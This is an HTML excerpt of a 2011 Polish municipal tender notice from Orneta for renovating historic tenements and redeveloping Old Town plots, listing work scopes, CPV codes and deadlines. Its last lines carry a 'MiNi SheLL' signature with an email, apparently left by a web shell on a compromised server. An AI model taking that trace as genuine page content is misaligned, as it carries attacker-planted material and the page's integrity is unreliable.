6)Zmianę w zatrudnieniu podwykonawców w przypadku, gdy Wykonawca oświadczył, iż  ykona umowę osobiście w zakresie zgodnym ze SIWZ oraz zmiany osobowej   podwykonawców oraz zakresu podwykonawstwa, 
7)Oznaczenie stron umowy, wyłącznie w wyniku dozwolonego w myśl ustawy Prawo zamówień publicznych następstwa prawnego albo zmiany nazwy lub innego 
oznaczenia strony (firmy) wynikającego z prawa albo dozwolonych prawem 
czynności powodujących taką zmianę.
8)Konieczność wprowadzenia  zmian  wynikających z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy, a są one korzystne dla zamawiającego</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.orneta.pl.<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Ornecie 11-130 Orneta , Plac Wolności 26 - Stanowisko d/s Zamówień publicznych (kam.A- parter..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.03.2011 godzina 11:00, miejsce: Urząd Miejski w Ornecie 11-130 Orneta , Plac Wolności 26 - Sekretariat pok. nr 3..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego Warmia i Mazury na lata 2007-2013. Oś priorytetowa 4 - Rozwój, restrukturyzacja i rewitalizacja miast. Działanie 4.2 - Rewitalizacja miast.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Renowacja zabytkowych kamienic w centrum Starego Miasta  w Ornecie przy ulicy Pionierów 10, 12, 14, 16..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> I. Zakres rzeczowy  dla Części 1 przedmiotu zamówienia    
1.  Renowacja zabytkowej kamienicy w centrum Starego Miasta w Ornecie przy ulicy Pionierów 10 na działce Nr 179/10 obręb Orneta 3
Charakterystyka kamienicy:
Kamienica usytuowana jest na obszarze objętym ścisła, prawna ochroną konserwatorską poprzez wpis do rejestru zabytków nieruchomych założenia urbanistycznego Starego Miasta w Ornecie na podstawie Decyzji WKZ nr O/5 z dnia 17. XI. 1956 r. Budynek wpisany do rejestru zabytków na podstawie decyzji nr 6/09 z dnia 18.05.2009r. Ww. kamienica jest dodatkowo chroniona na podstawie zapisów w miejscowym planie zagospodarowania przestrzennego dla Starego Miasta w Ornecie.
-powierzchnia użytkowa budynku : 335,15 m2 w tym: powierzchnia lokali mieszkalnych: 268,01 m2, powierzchnia lokali usługowych: 67,14 m2
1) Zakres zamówienia obejmuje wykonanie n/w zakresu rzeczowego  :
a)remont dachu w zakresie wykonania m.in.: wymiany pokrycia dachowego, odtworzenia historycznego pokrycia  dachowego mansardy z blachy, wymiany deskowania oraz wykonania izolacji  przeciwwilgociowej i cieplnej połaci dachowej ; wymiany elementów konstrukcyjnych więźby dachowej; usunięcia występujących zagrożeń mykologicznych, biologicznych i innych powodujących degradację stanu technicznego elementów dachu; wymiany obróbek blacharskich, rynien, rur spustowych, montażu ław kominiarskich, płotków przeciwśniegowych; przemurowania kominów; impregnacji drewnianych elementów konstrukcyjnych środkami owado i grzybobójczymi oraz  wykonania powłok zabezpieczenia ppoż; 
b)wykonanie izolacji pionowej ścian zewnętrznych
c)wykonanie przepuszczalnej opaski i odpływu wód opadowych
d)remont elewacji frontowej wraz z rekonstrukcją historycznych detali architektonicznych w zakresie niezbędnym do przywrócenia jej pełnych walorów architektonicznych i estetycznych obejmujący w szczególności: elementy architektoniczne i konstrukcyjne,  kolorystykę elewacji, wyprawy elewacyjne; 
e)remont elewacji tylnych wraz z dociepleniem ścian zewnętrznych
f) renowację, wymianę stolarki drzwiowej wejściowej
g)wymianę stolarki okiennej;
h)wymianę parapetów w lokalach mieszkalnych
i)remont klatki schodowej w zakresie niezbędnym do przywrócenia jej pełnych walorów architektonicznych i estetycznych obejmujący w szczególności wymianę, renowację elementów schodów klatki schodowej, remont posadzek korytarza na parterze, malowanie klatki schodowej
j)konserwację stropów piwnicznych i ścian, wykonanie wentylacji i posadzki w piwnicy
k)wymianę stropu drewnianego nad parterem na ognioodporny typu Kleina
l)wymianę podłogi w mieszkaniu 
ł)remont instalacji elektrycznej WLZ z dostosowaniem do obowiązujących przepisów
2.Renowacja zabytkowej kamienicy w centrum Starego Miasta w Ornecie przy ulicy Pionierów 12 na działce Nr 179/11 obręb Orneta 3
Charakterystyka kamienicy:
Kamienica usytuowana jest na obszarze objętym ścisła, prawna ochroną konserwatorską poprzez wpis do rejestru zabytków nieruchomych założenia urbanistycznego Starego Miasta w Ornecie na podstawie Decyzji WKZ nr O/5 z dnia 17. XI. 1956 r. Budynek wpisany do rejestru zabytków na podstawie decyzji nr 22/09 z dnia 26.10.2009r. Ww. kamienica jest dodatkowo chroniona na podstawie zapisów w miejscowym planie zagospodarowania przestrzennego dla Starego Miasta w Ornecie.
-powierzchnia użytkowa: 175,13 m2 w tym: powierzchnia lokali mieszkalnych: 88,33 m2,  powierzchnia lokali usługowych: 86,80 m2
1) Zakres zamówienia obejmuje wykonanie n/w zakresu rzeczowego :
a)remont dachu:  w zakresie wykonania m.in wymiany pokrycia dachowego, deskowania oraz wykonania izolacji  przeciwwilgociowej i cieplnej połaci dachowej ; wymiany, naprawy elementów konstrukcyjnych więźby dachowej; usunięcia występujących zagrożeń mykologicznych, biologicznych i innych powodujących degradację stanu technicznego elementów dachu; wymiany obróbek blacharskich, rynien, rur spustowych, montażu ław kominiarskich, płotków przeciwśniegowych; przemurowania kominów; impregnacji drewnianych elementów konstrukcyjnych środkami owado i grzybobójczymi oraz wykonania powłok zabezpieczenia ppoż; 
b)wykonanie izolacji pionowej ścian zewnętrznych
c)wykonanie przepuszczalnej opaski i odpływu wód opadowych od podwórza;
d)remont elewacji frontowej wraz z rekonstrukcją historycznych detali architektonicznych w zakresie niezbędnym do przywrócenia jej pełnych walorów architektonicznych i estetycznych obejmujący w szczególności: elementy architektoniczne i konstrukcyjne, kolorystykę elewacji, wyprawy elewacyjne
e)wymianę stolarki drzwiowej wejściowej  
f)wymianę stolarki okiennej;
g)wymianę parapetów w lokalach mieszkalnych
h)remont klatki schodowej w zakresie niezbędnym do przywrócenia jej pełnych walorów architektonicznych i estetycznych obejmujący w szczególności wymianę, renowację  elementów schodów klatki schodowej, malowanie klatki schodowej
i)konserwację stropów piwnicznych i ścian, wykonanie wentylacji i posadzki w piwnicy
j)remont elewacji tylnych wraz z dociepleniem ścian zewnętrznych;
3.Renowacja zabytkowej kamienicy w centrum Starego Miasta w Ornecie przy ulicy Pionierów 14 na działce Nr 179/12 obręb Orneta 3
Charakterystyka kamienicy:
Kamienica usytuowana jest na obszarze objętym ścisła, prawna ochroną konserwatorską poprzez wpis do rejestru zabytków nieruchomych założenia urbanistycznego Starego Miasta  w Ornecie na podstawie Decyzji WKZ nr O/5 z dnia 17. XI. 1956 r. Budynek wpisany do rejestru zabytków na podstawie decyzji nr 23/09 z dnia 26.10.2009r. Ww. kamienica jest dodatkowo chroniona na podstawie zapisów w miejscowym planie zagospodarowania przestrzennego dla Starego Miasta w Ornecie.
-powierzchnia użytkowa: 166,45 m2 w tym: powierzchnia lokali mieszkalnych: 141,47 m2 , powierzchnia lokali usługowych: 24,98 m2
1) Zakres zamówienia obejmuje wykonanie n/w zakresu rzeczowego :
a)remont dachu:  w zakresie wykonania m.in: wymiany pokrycia dachowego, deskowania oraz wykonania izolacji  przeciwwilgociowej i cieplnej dachu ; naprawy lub wymiany uszkodzonych elementów konstrukcyjnych więźby dachowej; usunięcia występujących zagrożeń mykologicznych, biologicznych i innych powodujących degradację stanu technicznego elementów dachu; wymiany obróbek blacharskich, rynien, rur spustowych, montażu ław kominiarskich, płotków przeciwśniegowych; przemurowania kominów ; impregnacji drewnianych elementów konstrukcyjnych środkami owado i grzybobójczymi oraz wykonania powłok zabezpieczenia ppoż; 
b)wykonanie izolacji pionowej ścian zewnętrznych
c)wykonanie przepuszczalnej opaski i odpływu wód opadowych od podwórza;
d)remont elewacji frontowej wraz z rekonstrukcją historycznych detali architektonicznych  w zakresie niezbędnym do przywrócenia jej pełnych walorów architektonicznych i estetycznych obejmujący w szczególności: elementy architektoniczne i konstrukcyjne, kolorystykę elewacji, wyprawy elewacyjne
e)renowację i wymianę stolarki drzwiowej wejściowej  
f) wymianę stolarki okiennej;
g)wymianę parapetów w lokalach mieszkalnych
h)remont klatki schodowej w zakresie niezbędnym do przywrócenia jej pełnych walorów architektonicznych i estetycznych obejmujący w szczególności wymianę, renowację elementów schodów klatki schodowej, malowanie klatki schodowej
i)konserwację stropów piwnicznych i ścian, wykonanie wentylacji i posadzki w piwnicy
j)remont elewacji tylnych wraz z dociepleniem ścian zewnętrznych;
4.Renowacja zabytkowej kamienicy w centrum Starego Miasta w Ornecie przy ulicy Pionierów 16 na działce Nr 179/13 obręb Orneta 3
Charakterystyka kamienicy:
Kamienica usytuowana jest na obszarze objętym ścisła, prawna ochroną konserwatorską poprzez wpis do rejestru zabytków nieruchomych założenia urbanistycznego Starego Miasta w Ornecie na podstawie Decyzji WKZ nr O/5 z dnia 17. XI. 1956 r. Budynek wpisany do rejestru zabytków na podstawie decyzji nr 25/09 z dnia 26.10.2009r. Ww. kamienica jest dodatkowo chroniona na podstawie zapisów w miejscowym planie zagospodarowania przestrzennego dla Starego Miasta w Ornecie.
-powierzchnia użytkowa: 130,73 m2 w tym: powierzchnia lokali mieszkalnych: 42,25 m2, powierzchnia lokali usługowych: 88,48 m2
1) Zakres zamówienia obejmuje wykonanie n/w zakresu rzeczowego :
a)remont dachu w zakresie: wymiany pokrycia dachowego, deskowania oraz wykonania izolacji  przeciwwilgociowej i cieplnej  dachu ; naprawy lub wymiany uszkodzonych elementów konstrukcyjnych więźby dachowej; usunięcia występujących zagrożeń mykologicznych, biologicznych i innych powodujących degradację stanu technicznego elementów dachu; wymiany obróbek blacharskich, rynien, rur spustowych, montażu ław kominiarskich, płotków przeciwśniegowych; przemurowania kominów ; impregnacji drewnianych elementów konstrukcyjnych środkami owado i grzybobójczymi oraz wykonania powłok zabezpieczenia ppoż; 
b)wykonanie izolacji pionowej ścian zewnętrznych
c)remont elewacji frontowej wraz z rekonstrukcją historycznych detali architektonicznych w zakresie niezbędnym do przywrócenia jej pełnych walorów architektonicznych i estetycznych obejmujący w szczególności: elementy architektoniczne i konstrukcyjne, kolorystykę elewacji, wyprawy elewacyjne
d)wymianę stolarki drzwiowej wejściowej  
e)wymianę stolarki okiennej;
f)wymianę parapetów w lokalach mieszkalnych
g)konserwację stropów piwnicznych i ścian, wykonanie wentylacji i posadzki w piwnicy
h)remont elewacji tylnych wraz z dociepleniem ścian zewnętrznych;
5.Promocja projektu 
6.Szczegółowy zakres przedmiotu zamówienia dla Części 1 opisują: dokumentacja 
projektowa   (Rozdział VIII SIWZ), przedmiary robót (Rozdział VI SIWZ), specyfikacja techniczna wykonania i  odbioru  robót  budowlanych (Rozdział VII SIWZ)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.40.00.00-1, 45.30.00.00-0, 45.26.00.00-7, 45.11.00.00-1, 45.23.32.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Renowacja zabytkowych kamienic w centrum Starego Miasta w Ornecie przy ulicy Kościuszki 8, Pionierów 15, 5..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres rzeczowy  dla Części 2 przedmiotu zamówienia:    
1. Renowacja zabytkowej kamienicy w centrum Starego Miasta w Ornecie przy ulicy Kościuszki 8 na działce Nr 167/13 obręb Orneta 3
Charakterystyka kamienicy:
Kamienica usytuowana jest na obszarze objętym ścisła, prawna ochroną konserwatorską poprzez wpis do rejestru zabytków nieruchomych założenia urbanistycznego Starego Miasta w Ornecie na podstawie Decyzji WKZ nr O/5 z dnia 17. XI. 1956 r. Budynek wpisany do rejestru zabytków na podstawie decyzji nr 7/09 z dnia 18.05.2009 r. Ww. kamienica jest dodatkowo chroniona na podstawie zapisów w miejscowym planie zagospodarowania przestrzennego dla Starego Miasta w Ornecie.
-powierzchnia użytkowa : 236,37 m2 w tym: powierzchnia lokali mieszkalnych: 167,34 m2, powierzchnia lokali usługowych: 69,03 m2
1)  Zakres zamówienia obejmuje wykonanie n/w zakresu rzeczowego  :
a)remont dachu : w zakresie wykonania m.in. wymiany pokrycia dachowego, deskowania oraz wykonania izolacji przeciwwilgociowej i cieplnej połaci dachowej ; wymiany elementów konstrukcyjnych więźby dachowej; usunięcia występujących zagrożeń mykologicznych, biologicznych i innych powodujących degradację stanu technicznego elementów dachu; wymiany obróbek blacharskich, rynien, rur spustowych, montażu ław kominiarskich, płotków przeciwśniegowych; przemurowania kominów ; impregnacji drewnianych elementów konstrukcyjnych środkami owado i grzybobójczymi oraz wykonania powłok zabezpieczenia ppoż 
b)wykonanie izolacji pionowej ścian zewnętrznych
c)wykonanie przepuszczalnej opaski i odpływu wód opadowych
d)remont elewacji frontowej i bocznej wraz z rekonstrukcją historycznych detali architektonicznych w zakresie niezbędnym do przywrócenia jej pełnych walorów architektonicznych i estetycznych obejmujący w szczególności: elementy architektoniczne i konstrukcyjne, kolorystykę elewacji, wyprawy elewacyjne.
e)renowację, wymianę stolarki drzwiowej wejściowej
f)wymianę stolarki okiennej 
g)wymianę parapetów w lokalach mieszkalnych
h)remont klatki schodowej w zakresie niezbędnym do przywrócenia jej pełnych walorów architektonicznych i estetycznych obejmujący w szczególności wymianę, renowację elementów schodów klatki schodowej, remont posadzek korytarza na parterze, malowanie klatki schodowej
i)konserwację stropów piwnicznych i ścian, wykonanie wentylacji i posadzki w piwnicy
j)remont elewacji tylnych wraz z dociepleniem ścian zewnętrznych
k)remont instalacji elektrycznej WLZ  z dostosowaniem do obowiązujących przepisów
2.  Renowacja zabytkowej kamienicy w centrum Starego Miasta w Ornecie przy ulicy Pionierów 15 na działce Nr 167/6 obręb Orneta 3
Charakterystyka kamienicy:
Kamienica usytuowana jest na obszarze objętym ścisła, prawna ochroną konserwatorską poprzez wpis do rejestru zabytków nieruchomych założenia urbanistycznego Starego Miasta w Ornecie na podstawie Decyzji WKZ nr O/5 z dnia 17. XI. 1956 r. Budynek wpisany do rejestru zabytków na podstawie decyzji nr 24/09 z dnia 26.10.2009r. Ww. kamienica jest dodatkowo chroniona na podstawie zapisów w miejscowym planie zagospodarowania przestrzennego dla Starego Miasta w Ornecie.
-powierzchnia użytkowa : 228, 28 m2 w tym: powierzchnia lokali mieszkalnych: 140,91 m2, powierzchnia lokali usługowych: 87,37 m2
1)  Zakres zamówienia obejmuje wykonanie n/w zakresu rzeczowego :
a)remont dachu w zakresie wykonania wymiany pokrycia dachowego, deskowania oraz wykonania izolacji przeciwwilgociowej i cieplnej połaci dachowej ; naprawy lub wymiany uszkodzonych elementów konstrukcyjnych więźby dachowej ; usunięcia występujących zagrożeń mykologicznych, biologicznych i innych powodujących degradację stanu technicznego elementów dachu; wymiany obróbek blacharskich, rynien, rur spustowych, montażu ław kominiarskich, płotków przeciwśniegowych; przemurowania kominów, impregnacji drewnianych elementów konstrukcyjnych środkami owado i grzybobójczymi oraz wykonania powłok zabezpieczenia ppoż 
b)wykonanie izolacji pionowej ścian zewnętrznych
c)remont elewacji frontowej wraz z rekonstrukcją historycznych detali architektonicznych w zakresie niezbędnym do przywrócenia jej pełnych walorów architektonicznych  i estetycznych obejmujący w szczególności: elementy architektoniczne i konstrukcyjne, kolorystykę elewacji, wyprawy elewacyjne
d)wykonanie przepuszczalnej opaski i odpływu wód opadowych
e)renowację, wymianę stolarki drzwiowej wejściowej
f)wymianę stolarki okiennej
g)wymianę parapetów w lokalach mieszkalnych
h)remont klatki schodowej w zakresie niezbędnym do przywrócenia jej pełnych walorów architektonicznych i estetycznych obejmujący w szczególności wymianę, renowację elementów schodów klatki schodowej, remont posadzek korytarza na parterze, malowanie klatki schodowej
i)konserwację stropów piwnicznych i ścian, wykonanie wentylacji i posadzki w piwnicy 
j)remont ściany zewnętrznej od podwórza w zakresie odtworzenia oraz wzmocnienie spękanych ścian,  remontu elewacji tylnych wraz z dociepleniem ścian zewnętrznych
k)remont instalacji elektrycznej WLZ  z dostosowaniem do obowiązujących przepisów
3.  Remont dachu i elewacji frontowej budynku mieszkalno-usługowego zlokalizowanego przy ulicy Pionierów 5 na działce nr 167/10 obręb Orneta 3
Charakterystyka kamienicy:
Kamienica usytuowana jest na obszarze objętym ścisła, prawna ochroną konserwatorską poprzez wpis do rejestru zabytków nieruchomych założenia urbanistycznego Starego Miasta  w Ornecie na podstawie Decyzji WKZ nr O/5 z dnia 17. XI. 1956 r. Budynek wpisany do rejestru zabytków na podstawie decyzji nr 5/09 z dnia 18.05.2009 r. Ww. kamienica jest dodatkowo chroniona na podstawie zapisów w miejscowym planie zagospodarowania przestrzennego dla Starego Miasta w Ornecie.
-powierzchnia użytkowa: 124,61 m2 w tym: powierzchnia lokali mieszkalnych: 89,06 m2, powierzchnia lokali usługowych: 34,95 m2                                          1)  Zakres zamówienia obejmuje wykonanie n/w zakresu rzeczowego :
a)remont dachu w zakresie wykonania m.in: wymiany drewnianej konstrukcji dachu, deskowania oraz pokrycia dachowego; impregnacji drewnianych elementów konstrukcyjnych środkami owado   i grzybobójczymi oraz wykonania powłok zabezpieczenia ppoż.; wymiany obróbek blacharskich, rynien, rur spustowych; przemurowania i otynkowania kominów 
b)wymianę  stolarki okiennej (witryn);
c)wymianę stolarki drzwiowej wejściowej;
d)remont elewacji frontowej wraz z rekonstrukcją historycznych detali architektonicznych w zakresie niezbędnym do przywrócenia jej pełnych walorów architektonicznych i estetycznych obejmujący w szczególności: elementy architektoniczne i konstrukcyjne, kolorystykę elewacji, wyprawy elewacyjne, obróbki blacharskie; 
4. Promocja projektu 
5. Szczegółowy zakres przedmiotu zamówienia dla Części 2 opisują: dokumentacja 
projektowa   (Rozdział VIII SIWZ), przedmiary robót (Rozdział VI SIWZ), specyfikacja techniczna wykonania i  odbioru  robót  budowlanych (Rozdział VII SIWZ)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.40.00.00-1, 45.30.00.00-0, 45.26.00.00-7, 45.11.00.00-1, 45.23.32.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zagospodarowanie i uporządkowanie zdegradowanych i pustych przestrzeni    
na obszarze Starego Miasta przy ulicy Plac Wolności 37; Żelaznej dz. nr. nr 167/14; 170;  
Żelaznej dz. nr. 171/9; 172; 171/8 w Ornecie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres rzeczowy  dla Części 3 przedmiotu zamówienia    
1.Zagospodarowanie i uporządkowanie zdegradowanych i pustych przestrzeni na obszarze Starego Miasta przy ulicy Plac Wolności 37 w Ornecie na działce Nr 179/16, 179/5 obręb Orneta 3
Charakterystyka obiektu:
Teren  usytuowany jest na obszarze objętym ścisła, prawna ochroną konserwatorską poprzez wpis do rejestru zabytków nieruchomych założenia urbanistycznego Starego Miasta w Ornecie na podstawie Decyzji WKZ nr O/5 z dnia 17. XI. 1956 r. 
1) Zakres rzeczowy obejmuje wykonanie: 
a)zagospodarowania zielenią 
b)elementów małej architektury - ławki, kosze na śmieci, pergola
c)placu zabaw
d)ogrodzenia terenu składowania odpadów stałych
e)robót drogowych w zakresie  wykonania nowej nawierzchni  przebudowywanego dziedzińca i miejsc postojowych z kostki kamiennej
f)robót sanitarnych w zakresie wykonania przebudowy przyłącza wodociągowego
g)robót elektrycznych w zakresie wykonania oświetlenia parkowego 
h)przebudowy infrastruktury TP
i)nadzór archeologiczny
j)obsługę geodezyjną wraz z wykonaniem inwentaryzacji geodezyjnej powykonawczej  w 3 egz. potwierdzonej przez PODGiK w  Lidzbarku Warmińskim
2.  Zagospodarowanie i uporządkowanie zdegradowanych i pustych przestrzeni na obszarze Starego Miasta przy ulicy Żelaznej dz. nr. nr 167/14; 170 w Ornecie
Charakterystyka obiektu:
Teren  usytuowany jest na obszarze objętym ścisła, prawna ochroną konserwatorską poprzez wpis do rejestru zabytków nieruchomych założenia urbanistycznego Starego Miasta w Ornecie na podstawie  Decyzji WKZ nr O/5 z dnia 17. XI. 1956 r. 
1) Zakres rzeczowy obejmuje wykonanie: 
a)zagospodarowania zielenią 
b)elementów małej architektury - ławki, kosze na śmieci
c)placu zabaw
d)montażu opraw oświetleniowych
e)ogrodzenia terenu składowania odpadów stałych
f)robót drogowych w zakresie  wykonania nowej nawierzchni  terenu  i miejsc postojowych z kostki kamiennej
g)przebudowy infrastruktury TP
h)nadzór archeologiczny
i)obsługę geodezyjną wraz z wykonaniem inwentaryzacji geodezyjnej powykonawczej  w 3 egz. potwierdzonej przez PODGiK w  Lidzbarku Warmińskim
3.  Zagospodarowanie i uporządkowanie zdegradowanych i pustych przestrzeni na obszarze Starego Miasta przy ulicy Żelaznej dz. nr. 171/9; 172; 171/8 w Ornecie Charakterystyka obiektu:
Teren  usytuowany jest na obszarze objętym ścisła, prawna ochroną konserwatorską poprzez wpis do rejestru zabytków nieruchomych założenia urbanistycznego Starego Miasta w Ornecie na podstawie Decyzji WKZ nr O/5 z dnia 17. XI. 1956 r. 
1)Zakres rzeczowy obejmuje wykonanie : 
a)robót przygotowawczych w zakresie wykonania robót rozbiórkowych istniejących elementów zagospodarowania terenu
b)robót ziemnych pod budowę nowego układu drogowego 
c)parkingu i drogi manewrowej w zakresie wykonania podbudowy, krawężników i nawierzchni z kostki betonowej 
d)chodników  i opaski
e)zieleni - trawniki, krzewy
f)montażu urządzeń infrastruktury drogowej (słupki drogowe, stojaki na rowery, znaki drogowe)
g)odcinka sieci kanalizacji deszczowej 
h)nadzór archeologiczny
i)obsługę geodezyjną wraz z wykonaniem inwentaryzacji geodezyjnej powykonawczej  w 3 egz. potwierdzonej przez PODGiK w  Lidzbarku Warmińskim
4. Promocja projektu 
5. Szczegółowy zakres przedmiotu zamówienia dla Części 3 opisują: dokumentacja 
projektowa   (Rozdział VIII SIWZ), przedmiary robót (Rozdział VI SIWZ), specyfikacja techniczna wykonania i  odbioru  robót  budowlanych (Rozdział VII SIWZ)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.23.31.40-2, 45.23.32.00-1, 45.23.24.11-6, 45.34.20.00-6, 45.31.61.00-6, 45.11.00.00-1, 77.31.00.00-6, 37.53.52.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com